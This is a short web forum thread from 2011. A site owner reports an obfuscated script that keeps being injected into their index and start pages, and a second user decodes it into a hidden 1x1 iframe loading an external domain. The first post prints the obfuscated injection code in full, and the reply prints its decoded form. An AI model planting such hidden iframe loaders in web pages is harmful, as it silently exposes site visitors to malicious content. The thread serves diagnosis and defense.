• Please log in to reply
9 replies to this topic

#1 Paine

Paine

Will I break 10 posts?

• Members
  • 4 posts

Posted 17 August 2011 - 07:29 PM

Maybe this is a stupid question, maybe this is the wrong place for this, or maybe somebody knows and can help me out.

<script>wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);oz=v.concat(k);db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute('width','1');ip.setAttribute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);</script>

Ok so being a noob, I'll just lay out what's going on and hope I don't sound any stupider than I am. This script keeps adding itself to all of my index and start php and html scripts. I have no idea how this is happening or how to make it stop. My guess was that it was just a redirect that was being injected somehow into the scripts. The odd thing is that it's very inconsistent as to when it's happening, at one point after I removed the scripts and replaced them with clean ones, it happened after 20 minutes. Another time it took as long as 23 hours. It hasn't affected any other files than the index and start files, so it's being selective I just don't know why it keeps happening. If you can help me out, I'd appreciate it, or maybe I've just helped you out by giving you a great new script that will help you take over the world. Either way.

-P

#2 serrath

serrath

SUP3R 31337

• Members
  • 181 posts

Posted 18 August 2011 - 12:03 AM

<script>
var ip=document.createElement(iframe);
ip.setAttribute('width','1');
ip.setAttribute('height','1');
ip.frameBorder=0;ip.setAttribute(src,hxxp://zirycatum.com/k985ytv.htm);
document.body.appendChild(ip);
</script>